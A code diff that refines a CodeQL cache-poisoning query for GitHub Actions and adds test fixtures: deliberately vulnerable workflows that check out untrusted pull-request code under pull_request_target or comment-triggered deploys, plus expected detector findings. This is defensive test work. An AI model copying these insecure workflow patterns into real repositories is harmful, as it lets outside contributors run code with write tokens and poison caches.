.../Security/CWE-349/CachePoisoning.expected | 57 +++++++++++++++++ .../CWE-829/.github/workflows/poc.yml | 63 ++++++++++++++++++ .../CWE-829/.github/workflows/poc2.yml | 58 +++++++++++++++++ .../CWE-829/.github/workflows/poc3.yml | 64 +++++++++++++++++++ .../CWE-829/.github/workflows/test.yml | 37 +++++++++++ .../UntrustedCheckoutCritical.expected | 60 +++++++++++++++++ .../CWE-829/UntrustedCheckoutMedium.expected | 2 + 11 files changed, 528 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 2a9952ce07f5..f202b1fcecf7 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -41,7 +41,8 @@ where // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) j.getAStep() = s and - s instanceof CacheWritingStep + s instanceof CacheWritingStep and + not s instanceof PoisonableStep or // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml new file mode 100644 index 000000000000..6900c3bc23fa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml @@ -0,0 +1,63 @@ +# This workflow uses actions that are not certified by GitHub. +# They are provided by a third-party and are governed by +# separate terms of service, privacy policy, and support +# documentation. + +# Sample workflow for building and deploying a Jekyll site to GitHub Pages +name: Deploy Jekyll site to Pages preview environment +on: + # Runs on pull requests targeting the default branch + pull_request_target: + branches: ["main"] +# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages +permissions: + contents: read + pages: write + id-token: write +# Allow only one concurrent deployment per PR, skipping runs queued between the run in-progress and latest queued. +# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. +concurrency: + group: 'pages-preview @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' + cancel-in-progress: false +jobs: + # Build job + build: + # Limit permissions of the GITHUB_TOKEN for untrusted code + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + # For PRs make sure to checkout the PR branch + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site + - name: Upload artifact + # Automatically uploads an artifact from the './_site' directory by default + uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 + # Deployment job + deploy: + environment: + name: 'Pages Preview' + url: ${{ steps.deployment.outputs.page_url }} + # Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages + permissions: + contents: read + pages: write + id-token: write + runs-on: ubuntu-latest + needs: build + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 + with: + preview: 'true' diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml new file mode 100644 index 000000000000..5501beb9ea2f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml @@ -0,0 +1,58 @@ +name: branch-deploy + +on: + issue_comment: + types: [created] + +# Permissions needed for reacting and adding comments for IssueOps commands +permissions: + pull-requests: write + deployments: write + contents: write + checks: read + +jobs: + branch-deploy: + name: branch-deploy + if: # only run on pull request comments and very specific comment body string as defined in our branch-deploy settings + ${{ github.event.issue.pull_request && + (startsWith(github.event.comment.body, '.deploy') || + startsWith(github.event.comment.body, '.noop') || + startsWith(github.event.comment.body, '.lock') || + startsWith(github.event.comment.body, '.help') || + startsWith(github.event.comment.body, '.wcid') || + startsWith(github.event.comment.body, '.unlock')) }} + runs-on: ubuntu-latest + + steps: + - name: branch-deploy + id: branch-deploy + uses: github/branch-deploy@v9 + with: + trigger: ".deploy" + environment: "production" + sticky_locks: "true" # https://github.com/github/branch-deploy/blob/1f6516ef5092890ce75d9e97ca7cbdb628e38bdd/docs/hubot-style-deployment-locks.md + + # Check out the ref from the output of the IssueOps command + - uses: actions/checkout@v4 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + ref: ${{ steps.branch-deploy.outputs.ref }} + + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + bundler-cache: true + + - name: bootstrap + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + run: script/bootstrap + + # Here we run a deploy. It is "gated" by the IssueOps logic and will only run if the outputs from our branch-deploy step indicate that the workflow should continue + - name: deploy + if: ${{ steps.branch-deploy.outputs.continue == 'true' && steps.branch-deploy.outputs.noop != 'true' }} + run: | + set -o pipefail + script/deploy | tee deploy.out + bundle exec ruby script/ci/render_deploy_message.rb + rm deploy.out diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml new file mode 100644 index 000000000000..4d5ae1f528cd --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml @@ -0,0 +1,64 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' + + deploy: + runs-on: ubuntu-latest + needs: build-and-upload + environment: + name: github-pages + url: ${{ steps.deployment.outputs.page_url }} + permissions: + pages: write + id-token: write + outputs: + deployment_url: ${{ steps.deployment.outputs.page_url }} + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@v1 + with: + preview: ${{ github.event_name == 'pull_request_target' }} diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 6a91d49c0ca0..2580531afd3b 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,4 +1,56 @@ edges +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:18:9:22:6 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:22:9:23:21 | Run Step | @@ -104,6 +156,11 @@ edges | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | #select +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml new file mode 100644 index 000000000000..6900c3bc23fa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml @@ -0,0 +1,63 @@ +# This workflow uses actions that are not certified by GitHub. +# They are provided by a third-party and are governed by +# separate terms of service, privacy policy, and support +# documentation. + +# Sample workflow for building and deploying a Jekyll site to GitHub Pages +name: Deploy Jekyll site to Pages preview environment +on: + # Runs on pull requests targeting the default branch + pull_request_target: + branches: ["main"] +# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages +permissions: + contents: read + pages: write + id-token: write +# Allow only one concurrent deployment per PR, skipping runs queued between the run in-progress and latest queued. +# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. +concurrency: + group: 'pages-preview @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' + cancel-in-progress: false +jobs: + # Build job + build: + # Limit permissions of the GITHUB_TOKEN for untrusted code + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + # For PRs make sure to checkout the PR branch + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site + - name: Upload artifact + # Automatically uploads an artifact from the './_site' directory by default + uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 + # Deployment job + deploy: + environment: + name: 'Pages Preview' + url: ${{ steps.deployment.outputs.page_url }} + # Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages + permissions: + contents: read + pages: write + id-token: write + runs-on: ubuntu-latest + needs: build + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 + with: + preview: 'true' diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml new file mode 100644 index 000000000000..5501beb9ea2f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml @@ -0,0 +1,58 @@ +name: branch-deploy + +on: + issue_comment: + types: [created] + +# Permissions needed for reacting and adding comments for IssueOps commands +permissions: + pull-requests: write + deployments: write + contents: write + checks: read + +jobs: + branch-deploy: + name: branch-deploy + if: # only run on pull request comments and very specific comment body string as defined in our branch-deploy settings + ${{ github.event.issue.pull_request && + (startsWith(github.event.comment.body, '.deploy') || + startsWith(github.event.comment.body, '.noop') || + startsWith(github.event.comment.body, '.lock') || + startsWith(github.event.comment.body, '.help') || + startsWith(github.event.comment.body, '.wcid') || + startsWith(github.event.comment.body, '.unlock')) }} + runs-on: ubuntu-latest + + steps: + - name: branch-deploy + id: branch-deploy + uses: github/branch-deploy@v9 + with: + trigger: ".deploy" + environment: "production" + sticky_locks: "true" # https://github.com/github/branch-deploy/blob/1f6516ef5092890ce75d9e97ca7cbdb628e38bdd/docs/hubot-style-deployment-locks.md + + # Check out the ref from the output of the IssueOps command + - uses: actions/checkout@v4 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + ref: ${{ steps.branch-deploy.outputs.ref }} + + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + bundler-cache: true + + - name: bootstrap + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + run: script/bootstrap + + # Here we run a deploy. It is "gated" by the IssueOps logic and will only run if the outputs from our branch-deploy step indicate that the workflow should continue + - name: deploy + if: ${{ steps.branch-deploy.outputs.continue == 'true' && steps.branch-deploy.outputs.noop != 'true' }} + run: | + set -o pipefail + script/deploy | tee deploy.out + bundle exec ruby script/ci/render_deploy_message.rb + rm deploy.out diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml new file mode 100644 index 000000000000..4d5ae1f528cd --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml @@ -0,0 +1,64 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' + + deploy: + runs-on: ubuntu-latest + needs: build-and-upload + environment: + name: github-pages + url: ${{ steps.deployment.outputs.page_url }} + permissions: + pages: write + id-token: write + outputs: + deployment_url: ${{ steps.deployment.outputs.page_url }} + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@v1 + with: + preview: ${{ github.event_name == 'pull_request_target' }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml new file mode 100644 index 000000000000..96fd8bdd1a4b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml @@ -0,0 +1,37 @@ +name: Tests +on: + push: + branches: + - master + pull_request: + workflow_dispatch: + +jobs: + tests: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Fetch CodeQL + shell: bash + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh extension install github/gh-codeql + gh codeql set-channel "nightly" + gh codeql version + printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" + - name: Install Packs + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh repo clone github/codeql + codeql pack install "ql/lib" + codeql pack install "ql/src" + codeql pack install "ql/test" + - name: Run Tests + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + codeql test run ql/test diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 29b311435dd5..57efc8af35dc 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -198,6 +198,58 @@ edges | .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:22:9:29:6 | Uses Step | | .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:29:9:33:28 | Uses Step | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:38:9:43:6 